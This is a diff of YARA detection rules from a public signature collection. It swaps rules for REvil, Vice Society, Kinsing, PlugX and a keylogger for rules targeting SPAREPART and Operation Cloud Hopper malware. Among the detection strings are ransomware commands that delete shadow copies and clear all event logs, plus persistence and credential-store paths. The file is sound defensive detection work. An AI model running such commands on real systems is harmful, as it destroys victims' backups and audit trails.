-		hash4 = "df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e"
+		tags = ""
+		version = "1"
+		weight = "100"
+		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment."
 
 	strings:
-		$s1 = "Mpsvc.dll" wide fullword
-		$s2 = ":0:4:8:<:@:D:H:L:P:T:X:\\:`:d:h:l:p:t:x:H<L<P<\\<`<" ascii fullword
-		$op1 = { 40 87 01 c3 6a 08 68 f8 0e 41 00 e8 ae db ff ff be 80 25 41 00 39 35 ?? 32 41 00 }
-		$op2 = { 8b 40 04 2b c2 c1 f8 02 3b c8 0f 84 56 ff ff ff 68 15 50 40 00 2b c1 6a 04 }
-		$op3 = { 74 73 db e2 e8 ad 07 00 00 68 60 1a 40 00 e8 8f 04 00 00 e8 3a 05 00 00 50 e8 25 26 00 00 }
-		$op4 = { 75 05 8b 45 fc eb 4c c7 45 f8 00 00 00 00 6a 00 8d 45 f0 50 8b 4d 0c }
-		$op5 = { 83 7d 0c 00 75 05 8b 45 fc eb 76 6a 00 68 80 00 00 00 6a 01 6a 00 }
+		$ = {C1 E8 06 89 [5] C1 E8 02 8B}
+		$ = {c1 e9 03 33 c1 [3] c1 e9 05 33 c1 83 e0 01}
+		$ = {8B 80 FC 00 00 00}
+		$ = {D1 E8 [4] c1 E1 0f 0b c1}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "c36dcd2277c4a707a1a645d0f727542a" or 2 of them )
+		all of them
 }
-rule SIGNATURE_BASE_APT_MAL_Revil_Kaseya_Jul21_2 : FILE
+rule SIGNATURE_BASE_MAL_Backdoor_SPAREPART_Struct : FILE
 {
 	meta:
-		description = "Detects malware used in the Kaseya supply chain attack"
-		author = "Florian Roth (Nextron Systems)"
-		id = "38b168d4-e761-544e-9859-eb155bbfe54a"
-		date = "2021-07-02"
+		description = "Detects the PDB and a struct used in SPAREPART"
+		author = "Mandiant"
+		id = "a04296d5-c146-5142-a8e8-418651f6b755"
+		date = "2022-12-14"
 		modified = "2023-12-05"
-		reference = "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_revil_general.yar#L32-L57"
+		reference = "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ru_sparepart_dec22.yar#L22-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "44948d93c71370a9976f22bf78cd1af80359f2c9804ea7995791109785cfaf84"
-		score = 75
+		hash = "f9cd5b145e372553dded92628db038d8"
+		logic_hash = "807c7404146c08995440987aef78ecde11224f7d6cad1a0d22269b2bf46a44e5"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		hash1 = "0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402"
-		hash2 = "8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd"
-		hash3 = "cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6"
-		hash4 = "d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f"
-		hash5 = "d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20"
-		hash6 = "e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2"
+		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment."
 
 	strings:
-		$opa1 = { 8b 4d fc 83 c1 01 89 4d fc 81 7d f0 ff 00 00 00 77 1? ba 01 00 00 00 6b c2 00 8b 4d 08 }
-		$opa2 = { 89 45 f0 8b 4d fc 83 c1 01 89 4d fc 81 7d f0 ff 00 00 00 77 1? ba 01 00 00 00 6b c2 00 }
-		$opa3 = { 83 c1 01 89 4d fc 81 7d f0 ff 00 00 00 77 1? ba 01 00 00 00 6b c2 00 8b 4d 08 0f b6 14 01 }
-		$opa4 = { 89 45 f4 8b 0d ?? ?0 07 10 89 4d f8 8b 15 ?? ?1 07 10 89 55 fc ff 75 fc ff 75 f8 ff 55 f4 }
-		$opb1 = { 18 00 10 bd 18 00 10 bd 18 00 10 0e 19 00 10 cc cc cc }
-		$opb2 = { 18 00 10 0e 19 00 10 cc cc cc cc 8b 44 24 04 }
-		$opb3 = { 10 c4 18 00 10 bd 18 00 10 bd 18 00 10 0e 19 00 10 cc cc }
+		$pdb = "c:\\Users\\user\\Desktop\\ImageAgent\\ImageAgent\\PreAgent\\src\\builder\\agent.pdb" ascii nocase
+		$struct = { 44 89 ac ?? ?? ?? ?? ?? 4? 8b ac ?? ?? ?? ?? ?? 4? 83 c5 28 89 84 ?? ?? ?? ?? ?? 89 8c ?? ?? ?? ?? ?? 89 54 ?? ?? 44 89 44 ?? ?? 44 89 4c ?? ?? 44 89 54 ?? ?? 44 89 5c ?? ?? 89 5c ?? ?? 89 7c ?? ?? 89 74 ?? ?? 89 6c ?? ?? 44 89 74 ?? ?? 44 89 7c ?? ?? 44 89 64 ?? ?? 8b 84 ?? ?? ?? ?? ?? 44 8b c8 8b 84 ?? ?? ?? ?? ?? 44 8b c0 4? 8d 15 ?? ?? ?? ?? 4? 8b cd ff 15 ?? ?? ?? ??  }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 2 of ( $opa* ) or 3 of them )
+		( uint16( 0 ) == 0x5A4D ) and uint32( uint32( 0x3C ) ) == 0x00004550 and $pdb and $struct and filesize < 20KB
 }
-rule SIGNATURE_BASE_APT_MAL_RANSOM_Vicesociety_Polyvice_Jan23_1 : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_1 : FILE
 {
 	meta:
-		description = "Detects NTRU-ChaChaPoly (PolyVice) malware used by Vice Society"
+		description = "Detects malware from Operation Cloud Hopper"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e450407c-6c21-56bf-aedf-8e7f3890abe2"
-		date = "2023-01-12"
-		modified = "2023-01-13"
-		reference = "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ransom_vicesociety_dec22.yar#L2-L31"
+		id = "28ca64ac-beee-51d9-96d4-a1f6d52823ec"
+		date = "2017-04-03"
+		modified = "2023-12-05"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L10-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3c7b76a693e5666515afee5c819b21e119ce5f1b0be675252673e6a24251ce8d"
+		logic_hash = "1e024767797fb146b92d6e8c549597c0cda7c2f8fb961299a3808b9b2e924666"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
-		hash1 = "326a159fc2e7f29ca1a4c9a64d45b76a4a072bc39ba864c49d804229c5f6d796"
-		hash2 = "8c8cb887b081e0d92856fb68a7df0dabf0b26ed8f0a6c8ed22d785e596ce87f4"
-		hash3 = "9d9e949ecd72d7a7c4ae9deae4c035dcae826260ff3b6e8a156240e28d7dbfef"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "27876dc5e6f746ff6003450eeea5e98de5d96cbcba9e4694dad94ca3e9fb1ddc"
 
 	strings:
-		$x1 = "C:\\Users\\root\\Desktop\\niX\\CB\\libntru\\" ascii
-		$s1 = "C:\\Users\\root" ascii fullword
-		$s2 = "#DBG: target = %s" ascii fullword
-		$s3 = "# ./%s [-p <path>]/[-f <file> ] [-e <enc.extension>] [-m <requirements file name>]" ascii fullword
-		$s4 = "### ################# ###" ascii fullword
-		$op1 = { 89 ca 41 01 fa 89 ef 8b 6c 24 24 44 89 c9 09 d1 44 31 e6 89 c8 }
-		$op2 = { bd 02 00 00 00 29 cd 48 0f bf d1 8b 44 46 02 01 44 53 02 8d 54 0d 00 83 c1 02 48 0f bf c2 }
-		$op3 = { 48 29 c4 4c 8d 74 24 30 4c 89 f1 e8 46 3c 00 00 84 c0 41 89 c4 0f 85 2b 02 00 00 0f b7 45 f2 }
+		$s1 = "zok]\\\\\\ZZYYY666564444" fullword ascii
+		$s2 = "z{[ZZYUKKKIIGGGGGGGGGGGGG" fullword ascii
+		$s3 = "EEECEEC" fullword ascii
+		$s4 = "IIEFEE" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 2 of them ) or 4 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_APT_MAL_RANSOM_Vicesociety_Chily_Jan23_1 : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_2 : FILE
 {
 	meta:
-		description = "Detects Chily or SunnyDay malware used by Vice Society"
+		description = "Detects Operation CloudHopper malware samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1be4adb9-e60c-5023-9230-07f5fd16daaa"
-		date = "2023-01-12"
-		modified = "2023-12-05"
-		reference = "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ransom_vicesociety_dec22.yar#L33-L63"
+		id = "7c0a3d68-5f6b-5491-b0c2-94e8cff478d1"
+		date = "2017-04-03"
+		modified = "2023-01-06"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L28-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fc2967d86bf73033e68b8b9409a197ae8f7fcdf06e1e2a17e3d277d243caa541"
-		score = 80
-		quality = 83
+		logic_hash = "dff8623c35c83c20fb525209ec9aa5d77b51fa494eb557845a8320c77746c02f"
+		score = 90
+		quality = 85
 		tags = "FILE"
-		hash1 = "4dabb914b8a29506e1eced1d0467c34107767f10fdefa08c40112b2e6fc32e41"
+		hash1 = "c1dbf481b2c3ba596b3542c7dc4e368f322d5c9950a78197a4ddbbaacbd07064"
 
 	strings:
-		$x1 = ".[Chily@Dr.Com]" ascii fullword
-		$s1 = "localbitcoins.com/buy_bitcoins'>https://localbitcoins.com/buy_bitcoins</a>" ascii fullword
-		$s2 = "C:\\Users\\root\\Desktop" ascii fullword
-		$s3 = "for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\"" wide fullword
-		$s4 = "cd %userprofile%\\documents\\" wide
-		$s5 = "noise.bmp" wide fullword
-		$s6 = " Execution time: %fms (1sec=1000ms)" ascii fullword
-		$s7 = "/c vssadmin.exe Delete Shadows /All /Quiet" wide fullword
-		$op1 = { 4c 89 c5 89 ce 89 0d f5 41 02 00 4c 89 cf 44 8d 04 49 0f af f2 89 15 e9 41 02 00 44 89 c0 }
-		$op2 = { 48 8b 03 48 89 d9 ff 50 10 84 c0 0f 94 c0 01 c0 48 83 c4 20 5b }
-		$op3 = { 31 c0 47 8d 2c 00 45 85 f6 4d 63 ed 0f 8e ec 00 00 00 0f 1f 80 00 00 00 00 0f b7 94 44 40 0c 00 00 83 c1 01 }
+		$x1 = "sERvEr.Dll" fullword ascii
+		$x2 = "ToolbarF.dll" fullword wide
+		$x3 = ".?AVCKeyLoggerManager@@" fullword ascii
+		$x4 = "GH0STCZH" ascii
+		$s1 = "%%SystemRoot%%\\System32\\svchost.exe -k \"%s\"" fullword wide
+		$s2 = "rundll32.exe \"%s\", UnInstall /update %s" fullword wide
+		$s3 = "\\Release\\Loader.pdb" ascii
+		$s4 = "%s\\%x.dll" fullword wide
+		$s5 = "Mozilla/4.0 (compatible)" fullword wide
+		$s6 = "\\syslog.dat" wide
+		$s7 = "NSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
+		$op1 = { 8d 34 17 8d 49 00 8a 14 0e 3a 14 29 75 05 41 3b }
+		$op2 = { 83 e8 14 78 cf c1 e0 06 8b f8 8b c3 8a 08 84 c9 }
+		$op3 = { 3b fb 7d 3f 8a 4d 14 8d 45 14 84 c9 74 1b 8a 14 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) or 3 of them ) or 4 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) or all of ( $op* ) ) or ( 6 of them )
 }
-rule SIGNATURE_BASE_Crime_H2Miner_Kinsing : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_3 : FILE
 {
 	meta:
-		description = "Rule to find Kinsing malware"
-		author = "Tony Lambert, Red Canary"
-		id = "1cabca0d-7134-517e-b82e-f2b20b4d1c34"
-		date = "2020-06-09"
+		description = "Detects malware from Operation Cloud Hopper"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ad1d3b48-d48c-5011-ac51-c8047e1ee8ed"
+		date = "2017-04-03"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_h2miner_kinsing.yar#L1-L20"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L59-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8795f01f4ce85ca37a4e4667a4ee9756dae6af42884cf79830877a5c35a3bd3b"
+		logic_hash = "d15b4c277e2c4dfe300f242e4cc9b217981166191a47939ca437c55391874b5d"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c21eaadf9ffc62ca4673e27e06c16447f103c0cf7acd8db6ac5c8bd17805e39d"
 
 	strings:
-		$s1 = "-iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT"
-		$s2 = "libpcap"
-		$s3 = "main.backconnect"
-		$s4 = "main.masscan"
-		$s5 = "main.checkHealth"
-		$s6 = "main.redisBrute"
-		$s7 = "ActiveC2CUrl"
-		$s8 = "main.RC4"
-		$s9 = "main.runTask"
+		$s6 = "operator \"\" " fullword ascii
+		$s7 = "zok]\\\\\\ZZYYY666564444" fullword ascii
+		$s11 = "InvokeMainViaCRT" fullword ascii
+		$s12 = ".?AVAES@@" fullword ascii
+		$op1 = { b6 4c 06 f5 32 cf 88 4c 06 05 0f b6 4c 06 f9 32 }
+		$op2 = { 06 fc eb 03 8a 5e f0 85 c0 74 05 8a 0c 06 eb 03 }
+		$op3 = { 7e f8 85 c0 74 06 8a 74 06 08 eb 03 8a 76 fc 85 }
 
 	condition:
-		( uint32( 0 ) == 0x464C457F ) and filesize > 1MB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( all of ( $s* ) and 1 of ( $op* ) ) or all of ( $op* ) ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_Korplug_FAST : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Dropper_1 : FILE
 {
 	meta:
-		description = "Rule to detect Korplug/PlugX FAST variant"
+		description = "Detects malware from Operation Cloud Hopper"
 		author = "Florian Roth (Nextron Systems)"
-		id = "85c6c460-2902-5bfa-be58-a2b62e3b882e"
-		date = "2015-08-20"
+		id = "b43ffb7e-1643-5560-8719-9c63582920e7"
+		date = "2017-04-03"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_korplug_fast.yar#L1-L27"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L81-L94"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c437465db42268332543fbf6fd6a560ca010f19e0fd56562fb83fb704824b371"
-		logic_hash = "31aeb634eecc0f93353432b0dde113bfb54810ea74b02f959447a1d42e7e9e1b"
+		logic_hash = "ee0caf8a08db9a2a83f10178e2ee890b6b0bc6e699ebb3d01fa94fa48c6dfdee"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "411571368804578826b8f24f323617f51b068809b1c769291b21125860dc3f4e"
 
 	strings:
-		$x1 = "%s\\rundll32.exe \"%s\", ShadowPlay" fullword ascii
-		$a1 = "ShadowPlay" fullword ascii
-		$s1 = "%s\\rundll32.exe \"%s\"," fullword ascii
-		$s2 = "nvdisps.dll" fullword ascii
-		$s3 = "%snvdisps.dll" fullword ascii
-		$s4 = "\\winhlp32.exe" ascii
-		$s5 = "nvdisps_user.dat" fullword ascii
-		$s6 = "%snvdisps_user.dat" fullword ascii
+		$s1 = "{\\version2}{\\edmins0}{\\nofpages1}{\\nofwords11}{\\nofchars69}{\\*\\company google}{\\nofcharsws79}{\\vern24611}{\\*\\password" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( $x1 or ( $a1 and 1 of ( $s* ) ) or 4 of ( $s* ) )
+		( uint16( 0 ) == 0x5c7b and filesize < 700KB and all of them )
 }
-rule SIGNATURE_BASE_APT_NK_MAL_Keylogger_Unknown_Nov19_1 : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_4 : FILE
 {
 	meta:
-		description = "Detects unknown keylogger reported by CNMF in November 2019"
+		description = "Detects malware from Operation Cloud Hopper"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5311d883-52e0-5503-9494-c583fabbedfe"
-		date = "2019-11-06"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/CNMF_VirusAlert/status/1192131508007505921"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_gen.yar#L2-L35"
+		id = "ebc810e6-f549-5401-9ee9-331888eda127"
+		date = "2017-04-03"
+		modified = "2023-01-06"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L96-L112"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a3b5c82cb8aa09e3c1b955bb175046e86f96da1f187eb46df83caaaf9e1370b2"
+		logic_hash = "7b39531e4af93ab026381a1114efe00fa01fb45860ddb512dbfa436471644e20"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "04d70bb249206a006f83db39bbe49ff6e520ea329e5fbb9c758d426b1c8dec30"
-		hash2 = "618a67048d0a9217317c1d1790ad5f6b044eaa58a433bd46ec2fb9f9ff563dc6"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ae6b45a92384f6e43672e617c53a44225e2944d66c1ffb074694526386074145"
 
 	strings:
-		$x1 = "CKeyLogDlg::Keylogger_WriteFile" ascii
-		$x2 = "Keylog file is saved >>>>>> %s" fullword ascii
-		$x3 = "MicCap file is saved >>>>>> %s" fullword ascii
-		$x4 = "cr5cr33nc4p.dat" fullword ascii
-		$xc1 = { 73 74 61 74 75 73 00 00 5C 4B 65 79 6C 6F 67 }
-		$xc2 = { 5B 43 4D 69 63 43 61 70 44 6C 67 5D 2E 00 00 00
-               25 30 34 64 25 30 32 64 25 30 32 64 25 30 32 64
-               25 30 32 64 2E 77 61 76 }
-		$xc3 = { 25 73 00 00 25 73 5C 2A 2E 2A 00 00 61 62 00 00
-               5B 25 73 5D 20 75 70 6C 6F 61 64 20 66 61 69 6C
-               65 64 2E 00 72 62 00 00 5B 25 73 5D 20 6F 70 65
-               6E 20 66 61 69 6C 65 64 2E 00 00 00 2E 2E 00 00
-               5B 25 73 20 2D 3E 20 25 73 5D 20 63 6F 70 79 20
-               66 61 69 6C 65 64 }
-		$s1 = "%s\\cmd.exe /c %s" fullword ascii
-		$s2 = "File upload error occured in [CFSDlg::ProcessResultMessage]." fullword ascii
-		$s3 = "\\SAM\\Domains\\Account\\Users\\Names" ascii
-		$s4 = "%s_hist%d:%d:%s:%s:::" fullword ascii
-		$s5 = "CARAT_Ws2_32.dll" fullword ascii
-		$s6 = "PID [%s], open process failed." fullword ascii
+		$s6 = "operator \"\" " fullword ascii
+		$s9 = "InvokeMainViaCRT" fullword ascii
+		$s10 = ".?AVAES@@" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize <= 40000KB and ( 1 of ( $x* ) or 4 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them )
 }
-rule SIGNATURE_BASE_Servantshell : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_5 : FILE
 {
 	meta:
-		description = "Detects Servantshell malware"
-		author = "Arbor Networks ASERT Nov 2015"
-		id = "f41e9191-0be1-59f7-9be4-e39c8a37b2c5"
-		date = "2017-02-02"
+		description = "Detects malware from Operation Cloud Hopper"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1ad189f8-a4c2-5f56-beec-a55bd516ad8d"
+		date = "2017-04-03"
 		modified = "2023-12-05"
-		reference = "https://tinyurl.com/jmp7nrs"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_servantshell.yar#L1-L17"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L114-L134"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "739057dc95831c9ed35981b40c606ecd0b3fd2118b42ed7c09e200dc0bc395db"
-		score = 70
+		logic_hash = "9b91ac8f450843c7c85e8d056218aff671bb0f345d16a7ba3f4180ac008bf318"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "beb1bc03bb0fba7b0624f8b2330226f8a7da6344afd68c5bc526f9d43838ef01"
 
 	strings:
-		$string1 = "SelfDestruction.cpp"
-		$string2 = "SvtShell.cpp"
-		$string3 = "InitServant"
-		$string4 = "DeinitServant"
-		$string5 = "CheckDT"
+		$x1 = "CWINDOWSSYSTEMROOT" fullword ascii
+		$x2 = "YJ_D_KROPOX_M_NUJI_OLY_S_JU_MOOK" fullword ascii
+		$x3 = "NJK_JK_SED_PNJHGFUUGIOO_PIY" fullword ascii
+		$x4 = "c_VDGQBUl}YSB_C_VDlqSDYFU" fullword ascii
+		$s7 = "FALLINLOVE" fullword ascii
+		$op1 = { 83 ec 60 8d 4c 24 00 e8 6f ff ff ff 8d 4c 24 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 2 of them ) ) or ( 4 of them )
 }
-
-rule SIGNATURE_BASE_MAL_Gandcrab_Apr18_1 : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_6 : FILE
 {
 	meta:
-		description = "Detects GandCrab malware"
+		description = "Detects malware from Operation Cloud Hopper"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ef7983cd-a7b3-5ce2-8cff-1bcf35bc6140"
-		date = "2018-04-23"
+		id = "b7578cbd-0f41-5dec-86f6-5792c305a182"
+		date = "2017-04-03"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/MarceloRivero/status/988455516094550017"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mal_grandcrab.yar#L3-L14"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L136-L152"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "70fc8deb91126a7404095aaa512e9b7542fe8605f83a037a10f8ccff76c27d4f"
+		logic_hash = "f165912001c5e2eb48cef46df12220f7f7a53e908a6af571bb4932c50e355388"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6fafe7bb56fd2696f2243fc305fe0c38f550dffcfc5fca04f70398880570ffff"
+		hash1 = "aabebea87f211d47f72d662e2449009f83eac666d81b8629cf57219d0ce31af6"
+
+	strings:
+		$s1 = "YDNCCOVZKXGRVQPOBRNXXQVNQYXBBCONCOQEGYELIRBEYOVODGXCOXTHXPCXNGUCHRVWKKZSYQMAOWWGHRSPRGSEUWYMEFZHRTHO" fullword ascii
+		$s2 = "psychiatry.dat" fullword ascii
+		$s3 = "meekness.lnk" fullword ascii
+		$s4 = "SOFTWARE\\EGGORG" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and pe.imphash ( ) == "7936b0e9491fd747bf2675a7ec8af8ba"
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Revil_Oct20_1 : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_7 : FILE
 {
 	meta:
-		description = "Detects REvil ransomware"
+		description = "Detects malware from Operation Cloud Hopper"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0c85a2cc-3487-577f-bd12-e3effd8fc811"
-		date = "2020-10-13"
+		id = "8d32e379-c902-5330-84f5-693a7649a2e4"
+		date = "2017-04-03"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_revil.yar#L2-L23"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L154-L168"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "756e49362c01abbca3208967630f09ed957e5c51956e0e5210b0167590582a82"
+		logic_hash = "01993e785fb7d5de9ea629d31725e86fa169b70dcde9716a5da0b646ac88864a"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4"
-		hash2 = "f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5"
-		hash3 = "f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d"
-		hash4 = "fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "44a7bea8a08f4c2feb74c6a00ff1114ba251f3dc6922ea5ffab9e749c98cbdce"
 
 	strings:
-		$op1 = { 0f 8c 74 ff ff ff 33 c0 5f 5e 5b 8b e5 5d c3 8b }
-		$op2 = { 8d 85 68 ff ff ff 50 e8 2a fe ff ff 8d 85 68 ff }
-		$op3 = { 89 4d f4 8b 4e 0c 33 4e 34 33 4e 5c 33 8e 84 }
-		$op4 = { 8d 85 68 ff ff ff 50 e8 05 06 00 00 8d 85 68 ff }
-		$op5 = { 8d 85 68 ff ff ff 56 57 ff 75 0c 50 e8 2f }
+		$x1 = "jepsjepsjepsjepsjepsjepsjepsjepsjepsjeps" fullword ascii
+		$x2 = "extOextOextOextO" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 2 of them or 4 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
 }
-
-rule SIGNATURE_BASE_Tscookie_RAT : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_8 : FILE
 {
 	meta:
-		description = "Detects TSCookie RAT"
+		description = "Detects malware from Operation Cloud Hopper"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a2b6c598-4498-5c0a-9257-b0bf6cd28de9"
-		date = "2018-03-06"
+		id = "5e0a09e3-732a-5a90-9d4a-11eae2aa4cc4"
+		date = "2017-04-03"
 		modified = "2023-12-05"
